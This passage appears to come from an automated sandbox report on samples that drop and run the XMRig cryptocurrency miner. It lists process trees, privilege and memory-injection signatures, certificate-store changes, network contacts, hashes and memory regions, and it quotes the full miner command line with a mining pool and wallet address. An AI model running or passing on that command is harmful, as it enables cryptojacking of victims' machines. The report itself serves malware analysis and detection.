7b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4728 wrote to memory of 4364 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4728 wrote to memory of 4364 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4308,i,3671441404766730751,12082497324212183132,262144 --variations-seed-version --mojo-platform-channel-handle=4136 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4656,i,3671441404766730751,12082497324212183132,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4364-14-0x000001F2417D0000-0x000001F2417F0000-memory.dmp
memory/4364-15-0x000001F241820000-0x000001F241840000-memory.dmp
memory/4364-16-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-18-0x000001F243110000-0x000001F243130000-memory.dmp
memory/4364-17-0x000001F2430F0000-0x000001F243110000-memory.dmp
memory/4364-19-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-20-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-21-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-23-0x000001F243110000-0x000001F243130000-memory.dmp
memory/4364-22-0x000001F2430F0000-0x000001F243110000-memory.dmp
memory/4364-24-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-25-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-26-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-27-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-28-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-29-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-30-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-31-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-32-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-33-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-34-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-35-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-36-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-37-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-38-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-39-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-40-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-41-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-42-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-43-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-44-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-45-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-46-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-47-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-48-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-49-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-50-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-51-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-52-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-53-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-54-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-55-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-56-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-57-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-58-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-59-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-60-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-61-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-62-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-63-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-64-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-65-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-66-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-67-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-68-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-69-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-70-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-71-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-72-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-73-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-74-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-75-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-76-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-77-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-78-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-79-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-80-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-81-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
memory/4364-82-0x00007FF72B830000-0x00007FF72C333000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:13
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1832 wrote to memory of 3488 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1832 wrote to memory of 3488 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4440,i,8998666007764333392,14724298544432336038,262144 --variations-seed-version --mojo-platform-channel-handle=4132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4736,i,8998666007764333392,14724298544432336038,262144 --variations-seed-version --mojo-platform-channel-handle=1712 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| BE | 88.221.83.201:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| IE | 52.111.236.22:443 | tcp | |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.246.116.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3488-14-0x0000018B50790000-0x0000018B507B0000-memory.dmp
memory/3488-15-0x0000018B51F80000-0x0000018B51FA0000-memory.dmp
memory/3488-16-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-18-0x0000018B51FC0000-0x0000018B51FE0000-memory.dmp
memory/3488-17-0x0000018B51FA0000-0x0000018B51FC0000-memory.dmp
memory/3488-19-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-20-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-23-0x0000018B51FC0000-0x0000018B51FE0000-memory.dmp
memory/3488-22-0x0000018B51FA0000-0x0000018B51FC0000-memory.dmp
memory/3488-21-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-24-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-25-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-26-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-27-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-28-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-29-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-30-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-31-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-32-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-33-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-34-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-35-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-36-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-37-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-38-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-39-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-40-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-41-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-42-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-43-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-44-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-45-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-46-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-47-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-48-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-49-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-50-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-51-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-52-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-53-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-54-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-55-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-56-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-57-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-58-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-59-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-60-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-61-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-62-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-63-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-64-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-65-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-66-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-67-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-68-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-69-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-70-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-71-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-72-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-73-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-74-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-75-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-76-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-77-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-78-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-79-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-80-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-81-0x00007FF648830000-0x00007FF649333000-memory.dmp
memory/3488-82-0x00007FF648830000-0x00007FF649333000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:15
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1799s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3416,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=1328 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3996,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=3988 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 15:56
Platform
win10v2004-20240508-en
Max time kernel
1627s
Max time network
1639s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:00
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e041